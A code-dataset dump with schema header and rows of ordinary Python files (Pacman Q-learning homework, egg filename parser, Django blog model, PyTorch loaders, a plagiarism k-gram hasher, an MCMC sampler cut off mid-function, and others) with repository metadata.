blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8a6cccdccaf0f2d9f455ac73ecd2822d428383a1 | b722490e4c269f4b53e085df566ec1f1d3d5393e | /setup.py | 0b06a0def03447c8fb2cc14f4b7c5a53cc893196 | [
"MIT"
] | permissive | wwilla7/mars | 5287e87cd91d20aa2595481d22532dcc40700e34 | 8df7c7f9c96a45330b3348b9dab9117e3ede4d80 | refs/heads/master | 2022-04-30T20:08:20.167031 | 2020-04-22T17:46:27 | 2020-04-22T17:46:27 | 257,968,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,147 | py | """
mars
A project for practicing cookiecutter
"""
import sys
from setuptools import setup, find_packages
import versioneer
short_description = __doc__.split("\n")
# from https://github.com/pytest-dev/pytest-runner#conditional-requirement
needs_pytest = {'pytest', 'test', 'ptr'}.intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
try:
with open("README.md", "r") as handle:
long_description = handle.read()
except:
long_description = "\n".join(short_description[2:])
setup(
# Self-descriptive entries which should always be present
name='mars',
author='wwilla',
author_email='liangyuewilla@gmail.com',
description=short_description[0],
long_description=long_description,
long_description_content_type="text/markdown",
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license='MIT',
# Which Python importable modules should be included when your package is installed
# Handled automatically by setuptools. Use 'exclude' to prevent some specific
# subpackage(s) from being added, if needed
packages=find_packages(),
# Optional include package data to ship with your package
# Customize MANIFEST.in if the general case does not suit your needs
# Comment out this line to prevent the files from being packaged with your software
include_package_data=True,
# Allows `setup.py test` to work correctly with pytest
setup_requires=[] + pytest_runner,
# Additional entries you may want simply uncomment the lines you want and fill in the data
# url='http://www.my_package.com', # Website
# install_requires=[], # Required packages, pulls from pip if needed; do not use for Conda deployment
# platforms=['Linux',
# 'Mac OS-X',
# 'Unix',
# 'Windows'], # Valid platforms your code works on, adjust to your flavor
# python_requires=">=3.5", # Python version restrictions
# Manual control if final package is compressible or not, set False to prevent the .egg from being made
# zip_safe=False,
)
| [
"liangyuewilla@gmail.com"
] | liangyuewilla@gmail.com |
629a1317427e9589d52846098d097024ce170513 | 49a3f9edcb5197afcceba623a551ec38d85ac496 | /HW3/qlearningAgents.py | dcd24edc4235c5832753e89eb9346acfe9cea085 | [] | no_license | guancongyi/Pacman | 0ceb0a743e5db8e6dc316d0ae5e6adb6308990ce | f51b27bdf727e2225ffa2ec39e333dffecc9c681 | refs/heads/master | 2022-04-16T18:28:18.792698 | 2020-03-14T20:47:48 | 2020-03-14T20:47:48 | 164,015,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,247 | py | # qlearningAgents.py
# ------------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
from game import *
from learningAgents import ReinforcementAgent
from featureExtractors import *
import random,util,math
class QLearningAgent(ReinforcementAgent):
"""
Q-Learning Agent
Functions you should fill in:
- computeValueFromQValues
- computeActionFromQValues
- getQValue
- getAction
- update
Instance variables you have access to
- self.epsilon (exploration prob)
- self.alpha (learning rate)
- self.discount (discount rate)
Functions you should use
- self.getLegalActions(state)
which returns legal actions for a state
"""
def __init__(self, **args):
"You can initialize Q-values here..."
ReinforcementAgent.__init__(self, **args)
"*** YOUR CODE HERE ***"
self.qValues = util.Counter()
def getQValue(self, state, action):
"""
Returns Q(state,action)
Should return 0.0 if we have never seen a state
or the Q node value otherwise
"""
"*** YOUR CODE HERE ***"
return self.qValues[(state, action)]
def computeValueFromQValues(self, state):
"""
Returns max_action Q(state,action)
where the max is over legal actions. Note that if
there are no legal actions, which is the case at the
terminal state, you should return a value of 0.0.
"""
"*** YOUR CODE HERE ***"
if len(self.getLegalActions(state)) == 0:
return 0.0
maxlist = [self.getQValue(state, action) for action in self.getLegalActions(state)]
return max(maxlist)
def computeActionFromQValues(self, state):
"""
Compute the best action to take in a state. Note that if there
are no legal actions, which is the case at the terminal state,
you should return None.
"""
"*** YOUR CODE HERE ***"
actions = self.getLegalActions(state)
if len(actions) == 0:
return None
else:
maxlist = []
for action in actions:
maxlist.append((self.getQValue(state, action),action))
return max(maxlist, key=lambda x:x[0])[1]
def getAction(self, state):
"""
Compute the action to take in the current state. With
probability self.epsilon, we should take a random action and
take the best policy action otherwise. Note that if there are
no legal actions, which is the case at the terminal state, you
should choose None as the action.
HINT: You might want to use util.flipCoin(prob)
HINT: To pick randomly from a list, use random.choice(list)
"""
# Pick Action
legalActions = self.getLegalActions(state)
action = None
"*** YOUR CODE HERE ***"
if len(legalActions) == 0:
return None
if util.flipCoin(self.epsilon):
return random.choice(legalActions)
else:
return self.computeActionFromQValues(state)
def update(self, state, action, nextState, reward):
"""
The parent class calls this to observe a
state = action => nextState and reward transition.
You should do your Q-Value update here
NOTE: You should never call this function,
it will be called on your behalf
"""
"*** YOUR CODE HERE ***"
self.qValues[(state, action)] = self.qValues[(state, action)] + self.alpha * (
reward + self.discount * self.getValue(nextState) - self.qValues[(state, action)])
def getPolicy(self, state):
return self.computeActionFromQValues(state)
def getValue(self, state):
return self.computeValueFromQValues(state)
class PacmanQAgent(QLearningAgent):
"Exactly the same as QLearningAgent, but with different default parameters"
def __init__(self, epsilon=0.05,gamma=0.8,alpha=0.2, numTraining=0, **args):
"""
These default parameters can be changed from the pacman.py command line.
For example, to change the exploration rate, try:
python pacman.py -p PacmanQLearningAgent -a epsilon=0.1
alpha - learning rate
epsilon - exploration rate
gamma - discount factor
numTraining - number of training episodes, i.e. no learning after these many episodes
"""
args['epsilon'] = epsilon
args['gamma'] = gamma
args['alpha'] = alpha
args['numTraining'] = numTraining
self.index = 0 # This is always Pacman
QLearningAgent.__init__(self, **args)
def getAction(self, state):
"""
Simply calls the getAction method of QLearningAgent and then
informs parent of action for Pacman. Do not change or remove this
method.
"""
action = QLearningAgent.getAction(self,state)
self.doAction(state,action)
return action
class ApproximateQAgent(PacmanQAgent):
"""
ApproximateQLearningAgent
You should only have to overwrite getQValue
and update. All other QLearningAgent functions
should work as is.
"""
def __init__(self, extractor='IdentityExtractor', **args):
self.featExtractor = util.lookup(extractor, globals())()
PacmanQAgent.__init__(self, **args)
self.weights = util.Counter()
def getWeights(self):
return self.weights
def getQValue(self, state, action):
"""
Should return Q(state,action) = w * featureVector
where * is the dotProduct operator
"""
"*** YOUR CODE HERE ***"
return self.getWeights()*self.featExtractor.getFeatures(state,action)
def update(self, state, action, nextState, reward):
"""
Should update your weights based on transition
"""
"*** YOUR CODE HERE ***"
diff = reward + self.discount * self.getValue(nextState) - self.getQValue(state, action)
features = self.featExtractor.getFeatures(state,action)
for f in features:
self.weights[f] += self.alpha * diff * features[f]
def final(self, state):
"Called at the end of each game."
# call the super-class final method
PacmanQAgent.final(self, state)
# did we finish training?
if self.episodesSoFar == self.numTraining:
# you might want to print your weights here for debugging
"*** YOUR CODE HERE ***"
pass
| [
"congyiguan@gmail.com"
] | congyiguan@gmail.com |
d854c8d7c4ff09f13074b1f110077016a3651153 | 695481436ed2ae8a373ed1a9ea9151fff55f305b | /OLS_linear_regression.py | f9fde77d7c8eaba36f9bb9323e144050991222db | [] | no_license | bernardpg/homogeneous | d9c724590599be2a8dd8bd1bb3612911a74027a9 | 6d7318ab5fd5d7f63eabec36b6299cc82779970c | refs/heads/master | 2021-05-13T20:40:41.627582 | 2018-01-12T17:16:59 | 2018-01-12T17:16:59 | 116,917,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,320 | py | import numpy as np
from scipy import linalg, optimize
import os as os
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
#####
#data-input
#F1_data
F1 = np.r_[45.9, 41.3, 10.8, 48.9, 32.8, 19.6, 2.1, 2.6, 5.8, 24, 35.1, 7.6, 32.9, 39.6, 20.5, 23.9, 27.7, 5.1, 15.9, 16.9, 12.6, 3.5, 29.3, 16.7, 27.1, 16, 28.3, 17.4, 1.5, 20, 1.4, 4.1, 43.8, 49.4, 26.7, 37.7, 22.3, 33.4, 27.7, 8.4, 25.7, 22.5, 9.9, 41.5, 15.8, 11.7]
#F2_data
F2 = np.r_[69.3, 58.5, 58.4, 75, 23.5, 11.6, 1, 21.2, 24.2, 4, 65.9, 7.2, 46, 55.8, 18.3, 19.1, 53.4, 23.5, 49.6, 26.2, 18.3, 19.5, 12.6, 22.9, 22.9, 40.8, 43.2, 38.6, 30, 0.3, 7.4, 8.5, 5, 45.7, 35.1, 32, 31.6, 38.7, 1.8, 26.4, 43.3, 31.5, 35.7, 18.5, 49.9, 36.8]
#label_data
Label = np.r_[9.3, 18.5, 12.9, 7.2, 11.8, 13.2, 4.8, 10.6, 8.6, 17.4, 9.2, 9.7, 19, 24.4, 11.3, 14.6, 18, 12.5, 5.6, 15.5, 9.7, 12, 15, 15.9, 18.9, 10.5, 21.4, 11.9, 9.6, 17.4, 9.5, 12.8, 25.4, 14.7, 10.1, 21.5, 16.6, 17.1, 20.7, 12.9, 8.5, 14.9, 10.6, 23.2, 14.8, 9.7]
####
#open_3d map
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
#ax = fig.gca(projection='3d')
##
###feature_map
A = np.c_[F1[:, np.newaxis],F2[:, np.newaxis]]
###feature_mean
feature_mean = np.mean(A, 0)
"""C=np.copy(A)
I=A.shape
for i in range(I[0]):
C[i] -= data_mean
"""
#label_mean
label_mean=np.mean(Label,0)
"""
#z_mean=np.mean(ei,0)
#b = np.copy(ei)
b = np.copy(z)
J=z.shape
#J=ei.shape
for i in range(J[0]):
b[i] -= z_mean
"""
####matrix multiply
#OLS-min-least
####
W=(linalg.pinv(A)).dot(Label)
print(W)
#solve-it
##### OLS algorithm utilize the mean-point to calculate the 常數
###feature_map
#constant
const= (W[0]*feature_mean[0]+W[1]*feature_mean[1]-label_mean)
#con=con.repeat(len(F1))
###utilize-the_mean_value to calculate it
####
#plot_3d_map
####
#####
LR = lambda x,y : W[0]*x + W[1]*y-const
x2 = y2 = np.arange(0, 60.0)
X, Y = np.meshgrid(x2, y2)
zs = np.array([LR(x2,y2) for x2,y2 in zip(np.ravel(X), np.ravel(Y))])
Z = zs.reshape(X.shape)
s=np.array([LR(x2,y2) for feature_mean[0], feature_mean[1] in zip(np.ravel(X), np.ravel(Y))])
ax.plot_surface(X, Y, Z)
ax.scatter(F1,F2,Label)
ax.set_xlabel('X Label')
ax.set_ylabel('Y Label')
ax.set_zlabel('Z Label')
plt.show()
###vector_normal
V=np.r_[1,W]
V_normal=V/np.linalg.norm(V)
print(V_normal)
#n = norm(X,option) 解完
| [
"scottpiliben@gmail.com"
] | scottpiliben@gmail.com |
2a715ba1c3bd9636d92fbac36798cfaf9786dc35 | 5dd03f9bd8886f02315c254eb2569e4b6d368849 | /src/python/twitter/common/python/eggparser.py | 9b5b6bdc1282fe4543ffc44cae5daacea7063937 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] | permissive | adamsxu/commons | 9e1bff8be131f5b802d3aadc9916d5f3a760166c | 9fd5a4ab142295692994b012a2a2ef3935d35c0b | refs/heads/master | 2021-01-17T23:13:51.478337 | 2012-03-11T17:30:24 | 2012-03-11T17:30:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,547 | py | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
class EggParserOsModule:
"""
Abstraction of the os-level functions the egg parser needs, so we can
break it in tests.
"""
@staticmethod
def uname():
import os
return os.uname()
@staticmethod
def version_info():
import sys
return sys.version_info
class EggParser(object):
"""
Parser of .egg filenames, which come in the following format:
name ["-" version ["-py" pyver ["-" required_platform]]] "." ext
"""
def __init__(self,
uname = EggParserOsModule.uname(),
version_info = EggParserOsModule.version_info()):
self._uname = uname
self._version_info = version_info
@staticmethod
def _get_egg_name(components):
return (components[0], components[1:])
@staticmethod
def _get_egg_version(components):
for k in range(len(components)):
if components[k].startswith("py"):
return ('-'.join(components[0:k]), components[k:])
if components:
return ('-'.join(components), [])
else:
return (None, [])
@staticmethod
def _get_egg_py_version(components):
if components and components[0].startswith("py"):
try:
major, minor = components[0][2:].split('.')
major, minor = int(major), int(minor)
return ((major, minor), components[1:])
except:
pass
return ((), components)
@staticmethod
def _get_egg_platform(components):
return (tuple(components), [])
def parse(self, filename):
if not filename: return None
if not filename.endswith('.egg'): return None
components = filename[0:-len('.egg')].split('-')
package_name, components = EggParser._get_egg_name(components)
package_version, components = EggParser._get_egg_version(components)
package_py_version, components = EggParser._get_egg_py_version(components)
package_platform, components = EggParser._get_egg_platform(components)
return (package_name, package_version, package_py_version, package_platform)
def get_architecture(self):
py_version = self._version_info[0:2]
platform = self._uname[0].lower()
arch = self._uname[-1].lower()
if platform == 'darwin': platform = 'macosx'
return (platform, arch, py_version)
def is_compatible(self, filename):
try:
_, _, egg_py_version, egg_platform = self.parse(filename)
except:
return False
my_platform, my_arch, my_py_version = self.get_architecture()
if egg_py_version and egg_py_version != my_py_version: return False
if egg_platform and egg_platform[0] != my_platform: return False
# ignore specific architectures until we ever actually care.
return True
| [
"jsirois@twitter.com"
] | jsirois@twitter.com |
c42a99064e1ef26fa41a3ef19c58eee52c0517f7 | 73eb6ba35333bc143f42bfd822e725991c594463 | /server/app/wordpredictor/dictionary/dictionary.py | cea8b6fed8402eefd23ce49ba120cf9624da8885 | [] | no_license | LoveFeelings/bogstavere | 790a43d01bcff33185abdea4aa4ca954ef70ffa8 | 47d1de0d901bba6884e2f822f28e6a04b3c956db | refs/heads/master | 2020-12-11T01:51:32.539632 | 2015-07-01T17:57:00 | 2015-07-01T17:57:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,939 | py | from . trie import Trie
from . node import Node
import codecs
class Dictionary(object):
def __init__(self, words ):
self.trie = Trie()
self.words = words
self.__load_words()
self.path = []
self.reset()
self.lastWasInteger = False
def reset(self):
self.path = []
self.path.append(Node(self.trie))
def __load_words(self):
self.trie.load(self.words)
def __prefix(self):
prefix = ""
for pn in self.path[0:-1]:
node_index = pn.nodeIndex
prefix += pn.trie.root[node_index][0]
return prefix
def addInt(self):
self.lastWasInteger = True
def keypress( self, key ) :
if key == "space":
self.reset()
return self.wordList()
if key == "backspace":
if self.path and not self.lastWasInteger :
self.path.pop()
if self.lastWasInteger :
self.lastWasInteger = False
if not self.path:
self.reset()
return self.wordList()
return self.search( key )
def search(self, letter):
path_node = self.path[-1]
trie = path_node.trie
node_index = path_node.nodeIndex
word_part_index = path_node.wordPartIndex
next, node_index, word_part_index = trie.step( letter , node_index , word_part_index )
print( next , node_index , word_part_index )
self.path[-1].update(node_index, word_part_index )
if next :
self.path.append( Node( next ) )
return self.wordList()
def wordList(self):
import collections
WordList = collections.namedtuple( "WordList" , [ "prefix" , "suffixes" ] )
path_node = self.path[-1]
prefix = self.__prefix()
suffixes = path_node.trie.walk(0,1)
return WordList( prefix , suffixes )
| [
"pallebh@gmail.com"
] | pallebh@gmail.com |
873c47468a937c9973ab6950cd7b3b06f9e616ae | 56c68bfa60f8c5c49f33a78a2dee874980de36a7 | /kgram.py | 3091af39f17d6123bccb513df61493702e0be285 | [] | no_license | XunzhaoYu/SimilarityTester | a705c042149264b7b5dda5e19372fe2d2785ede8 | 5644963486a08524c0e5aea41808bfe774db6a0e | refs/heads/master | 2021-08-23T10:53:55.405169 | 2017-12-04T15:54:03 | 2017-12-04T15:54:03 | 112,972,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,140 | py | #!/usr/bin/env python
# coding=utf-8
# The steps of calculate hash for similarity check:
# 1. pre-processing
# 2. dividing the files by K-gram. List kGram.
# 3. calculating the hash value of kGram. List hashList.
# 4. shrinking the size of list by winnowing algorithm. Dictionary winHash.
import os
import time
import datetime
import timeit
import numpy as np
K = 12
data = ""
winHashList = []
readPath = "/Users/xunzhaoyu/Documents/PhD/Documents of Study/TA/submissions/submissions_pre/"
writePath = "/Users/xunzhaoyu/Documents/PhD/Documents of Study/TA/submissions/submissions_hash/"
fileList = os.listdir(readPath)
fileList = fileList[1:len(fileList)] # remove the hidden file ".DS_Store"
print fileList
count = 0;
for f in fileList:
print f
count += 1
print count
fileReadPath = os.path.join(readPath, f)
fileWritePath = os.path.join(writePath, f)
if os.path.isfile(fileReadPath):
srcFile = open(fileReadPath)
objFile = open(fileWritePath, "w")
data = srcFile.read()
# Step2: k-gram division -- kGram
kGram = []
shingleNum = len(data)-K
for i in range(0, shingleNum):
shingle = data[i:i+K]
kGram.append(shingle)
print kGram
print "the number of k-gram:" + str(len(kGram)) + ", " + str(shingleNum)
# Step3: rolling hash -- hashList
Base = 3
first_hash = 0
pre_hash = 0
hash = 0
hashList = []
firstShingle = kGram[0]
# start = time.time()
# stTime = datetime.datetime.now()
for i in range(K):
hash += ord(firstShingle[i])*(Base**(K-1-i))
hashList.append(hash)
for i in range(1, len(kGram)):
preshingle = kGram[i-1]
shingle = kGram[i]
hash = hash * Base - ord(preshingle[0])*Base**K + ord(shingle[K-1])
hashList.append(hash)
print hashList
# end = time.time()
# endTime = datetime.datetime.now()
# print "rolling Hash running time :" + str((end-start))
# Step4: winnowing hash -- winHash
WINSIZE = 4
winCnt= len(kGram)-WINSIZE+1
minHash = 0
minPos = 0
""""
winHash = {}
for i in range(winCnt):
templist = hashList[i:WINSIZE+i]
minHash= templist[WINSIZE-1]
minPos = WINSIZE+i-1
for j in range(WINSIZE):
if templist[j] < minHash:
minHash = templist[j]
minPos = i+j
if not winHash.has_key(minPos):
winHash[minPos] = minHash
print winHash
"""
element = 0
preMinPos = 0
winHash = set()
for i in range(winCnt):
templist = hashList[i:WINSIZE+i]
# calculate the minHash in a window
minHash = templist[WINSIZE-1]
minPos = WINSIZE+i-1
for j in range(WINSIZE):
if templist[j] < minHash:
minHash = templist[j]
minPos = i+j
if minPos != preMinPos:
# calculate the token of a new minHash
element = minHash * 100
# while winHash.count(element) != 0:
while element in winHash:
element = element + 1
winHash.add(element)
preMinPos = minPos
print winHash
winHashList.append(winHash)
objFile.write(str(winHash))
srcFile.close()
objFile.close()
# get results
resemblance = np.eye(count+1)
for i in xrange(count):
resemblance[0, i+1] = i+1
for j in xrange(i + 1, count):
n = len(set(winHashList[i]).intersection(set(winHashList[j])))
u = len(set(winHashList[i]).union(set(winHashList[j])))
resemblance[i+1, j+1] = int( 100 * (float(n)/float(u)) )
resemblance = resemblance + resemblance.T - 2*np.eye(count+1)
print resemblance
resultPath = "/Users/xunzhaoyu/Documents/PhD/Documents of Study/TA/submissions/result.csv"
resultFile = open(resultPath, "w")
np.savetxt(resultPath, resemblance, delimiter = ',')
resultFile.close()
# analyze the results
statistic = np.zeros((count, 2))
for i in xrange(count):
temp = resemblance[i+1, :]
temp = temp[1:(count+1)]
statistic[i, 0] = sum(temp * temp.T)/count
statistic[i, 1] = int(i+1)
swap = True
for i in range(1, count):
if not swap:
break
else:
swap = False
for j in range(0, count - i):
if statistic[j, 0] < statistic[j+1, 0]:
temp = statistic[j, 0]
temp2 = statistic[j, 1]
statistic[j, 0] = statistic[j + 1, 0]
statistic[j, 1] = statistic[j + 1, 1]
statistic[j + 1, 0] = temp
statistic[j + 1, 1] = temp2
swap = True
print statistic
analysisPath = "/Users/xunzhaoyu/Documents/PhD/Documents of Study/TA/submissions/analysis.csv"
analysisFile = open(analysisPath, "w")
np.savetxt(analysisPath, statistic, delimiter = ',')
analysisFile.close() | [
"yuxunzhao@gmail.com"
] | yuxunzhao@gmail.com |
3a315d7c3d8e26c82ab3344a577f4630bbfac7f1 | 8c29a91548da2f643721af663dd9962d50ca911e | /scripts/kill_script.py | 885459d2494b49ff25f0523714a67cd26c7c78f7 | [] | no_license | ProjetEpfNao/Nao | 6b031243fd6ef02b9b6ca0142afe4f57617b4c22 | f6ed20778afafabcb7c01c47d0a322d28b9fea59 | refs/heads/master | 2020-05-23T06:27:26.520497 | 2016-12-14T12:15:18 | 2016-12-14T12:15:18 | 69,444,582 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | from naoqi import ALProxy
if __name__ == "__main__":
proxy = ALProxy("ALVideoRecorder", "localhost", 9559)
proxy.stopRecording()
| [
"etienne.desticourt@gmail.com"
] | etienne.desticourt@gmail.com |
e639cdea31e0d47779d30f5049feb042c8b3a5eb | 8a67820d95f73c90d4edab5537e22ca1fcaa3aee | /ProyectoPruebaDjango/apps/posts/models.py | 30c4cc5e0c34d106a883d0bbc5c71b14c7bd1467 | [] | no_license | sebamawa/ProyectoPruebaDjango | 3803e9950600fa082fe8ad9d76d1789e11e80fbb | 964a45a1c834670c2abe5273378e12ab24ff060a | refs/heads/master | 2020-03-23T19:15:30.234917 | 2018-08-20T05:21:27 | 2018-08-20T05:21:27 | 141,962,235 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,233 | py | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from django import forms
from django.template.defaultfilters import slugify
# Create your models here.
class Post(models.Model):
STATUS_CHOICES = (
('draft', 'Draft'),
('published', 'Published'),
)
title = models.CharField(max_length=250)
slug = models.SlugField(max_length=250, unique_for_date='publish')
#We specify the name of the reverse relationship, from User to Post,
#with the related_name attribute.This will allow us to access related objects easily.
author = models.ForeignKey(User, on_delete=models.CASCADE, related_name='blog_posts')
body = models.TextField()
publish = models.DateTimeField(default=timezone.now)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
status = models.CharField(max_length=10, choices=STATUS_CHOICES, default='draft')
class Meta:
ordering = ('-publish',) #descending order by default when we query the database
def __str__(self):
return self.title
class PostForm(forms.ModelForm):
class Meta:
model = Post
fields = '__all__'
| [
"sebamawa@hotmail.com"
] | sebamawa@hotmail.com |
c6a37527e2dbf47a3b1c4ec52b718c605ecfc8d0 | 9dc60f33538e00e4b5c04d5180db22dbe252f4ba | /Spark_Session/utileriasCiti.py | 34617215ff662a3bfba8e8b4c3c3ef582ce3af7f | [] | no_license | jorgeecr/pyspark | 285a29f57d6bdfe340a2c3f3e7e42d10a6c0e7ed | c276ea868e0b8856acd8269b5f6d4a50ba00e327 | refs/heads/main | 2023-03-12T17:57:49.538674 | 2021-02-24T01:47:21 | 2021-02-24T01:47:21 | 342,012,522 | 1 | 0 | null | 2021-02-24T19:31:02 | 2021-02-24T19:31:01 | null | UTF-8 | Python | false | false | 664 | py | from pyspark import HiveContext
from pyspark.sql.types import *
from pyspark.sql import Row, functions as F
#from pyspark.sql import col
from pyspark.sql.window import Window
from pyspark.sql import SparkSession
from pyspark import SparkContext
from pyspark import SparkConf
from pyspark.sql.functions import lpad
from pyspark.sql.functions import *
import os
import sys
import datetime
def GuardaMiTabla(df,BD,TABLA):
df.show(10)
print("Inicia guardado de La tabla: " + BD + "." + TABLA )
df2=df.withColumn("Area", lit("PLD"))
df2.saveAsTable(BD + "." + TABLA, mode='overwrite')
print("La tabla: " + BD + "." + TABLA + " Ha sido generada")
| [
"noreply@github.com"
] | jorgeecr.noreply@github.com |
055ee26a0b40791d1b3fe385cb7e13e159159ca7 | 2ff7e5c99dd447c42d7883996762400a77404c13 | /data_loader/data_loader.py | 75564ed14a080e12f5940ea1be19adc9600daf16 | [] | no_license | jinyangturbo/sumNet | 5e0254b294059e3ae583e5814f0f4b507bdead66 | ae7756ba4ef478f6f914b1f65f9dc27e1a2991fe | refs/heads/master | 2021-07-20T08:31:12.387971 | 2017-10-30T06:58:19 | 2017-10-30T06:58:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,610 | py | import torch
import torchvision.datasets as dset
import torchvision.transforms as transforms
import torchvision
torch.manual_seed(0)
# load mnist dataset
def load_mnist_dataset(shuffle=True, batch_size = 64, num_workers=1, root_dir='./data/mnist'):
data_transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5,), (1.0,))])
train_set = dset.MNIST(root=root_dir, train=True, transform=data_transform, download=False)
test_set = dset.MNIST(root=root_dir, train=False, transform=data_transform, download=False)
train_loader = torch.utils.data.DataLoader(dataset=train_set, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)
test_loader = torch.utils.data.DataLoader(dataset=test_set, batch_size=batch_size, shuffle=False, num_workers=num_workers)
print('==>>> total trainning batch number: {}'.format(len(train_loader)))
print('==>>> total testing batch number: {}'.format(len(test_loader)))
return train_loader, test_loader
# load fashion-mnist dataset
def load_fashion_mnist_dataset(shuffle=True, batch_size = 64, num_workers=1, root_dir='./data/fashion_mnist'):
data_transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5,), (1.0,))])
train_set = FashionMNIST(root=root_dir, train=True, transform=data_transform, download=False)
test_set = FashionMNIST(root=root_dir, train=False, transform=data_transform, download=False)
train_loader = torch.utils.data.DataLoader(dataset=train_set, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)
test_loader = torch.utils.data.DataLoader(dataset=test_set, batch_size=batch_size, shuffle=False, num_workers=num_workers)
print('==>>> total trainning batch number: {}'.format(len(train_loader)))
print('==>>> total testing batch number: {}'.format(len(test_loader)))
return train_loader, test_loader
# load mnist dataset
def load_cifar10_dataset(shuffle=True, batch_size = 64, num_workers=1, root_dir='./data/cifar10'):
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
train_set = torchvision.datasets.CIFAR10(root=root_dir, train=True, download=False, transform=transform_train)
train_loader = torch.utils.data.DataLoader(train_set, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)
test_set = torchvision.datasets.CIFAR10(root=root_dir, train=False, download=False, transform=transform_test)
test_loader = torch.utils.data.DataLoader(test_set, batch_size=100, shuffle=False, num_workers=num_workers)
print('==>>> total trainning batch number: {}'.format(len(train_loader)))
print('==>>> total testing batch number: {}'.format(len(test_loader)))
return train_loader, test_loader
class FashionMNIST(dset.MNIST):
"""`Fashion MNIST <https://github.com/zalandoresearch/fashion-mnist>`_ Dataset.
"""
urls = [
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-images-idx3-ubyte.gz',
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-labels-idx1-ubyte.gz',
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-images-idx3-ubyte.gz',
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-labels-idx1-ubyte.gz',
] | [
"solopku@hotmail.com"
] | solopku@hotmail.com |
d179a1555ad8e8c73fe5003ff3315b9930a08df5 | f435930662f1e99bbc22a4557c9636842d59b207 | /mcmc.py | 4e8b2529d205026bed9f288e059d9876b7c18a1b | [
"MIT"
] | permissive | simedcn/SysID | d4c3a93aaded0681ed485a97f7848e9c76ba0e56 | 6673b042242a53b78d56d5cc287d6edc73568cfe | refs/heads/master | 2022-01-23T01:19:22.582310 | 2019-08-19T14:13:25 | 2019-08-19T14:13:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,269 | py | import numpy as np
from scipy.stats import multivariate_normal as mvn
from scipy.stats import laplace
class mcmc:
def __init__(self, niter, data, model, isSparse):
self.niter = niter
self.data = data
self.model = model
self.th = np.zeros([niter, model.dim]) # quantity of interest (QoI)
self.p = np.zeros(niter) # relative poterior probability
self.th_mc = np.zeros([niter, model.dim]) # store the Markov chain {theta_t,t=1,2,...}
self.isSparse = isSparse
'''
compute posterior probability
'''
def posterior(self, th):
mu_th = self.model.mu_th
cov_th = self.model.cov_th
mu_eps = self.model.mu_eps
cov_eps = self.model.cov_eps
# compute model prediction corresp. to guess th
predict = self.model.modelFun(th)
if any(predict == np.nan): # if the prediction not make sense, posterior = 0
return 0
# data = predict + eps, where eps is assumed normally distr'd
epsilon = np.linalg.norm( self.data - predict)
if self.isSparse: # use sparse inducing prior?
p_th = laplace.pdf(th, loc=mu_th, scale=cov_th).prod()
else:
# generic prior (assume std normal distr)
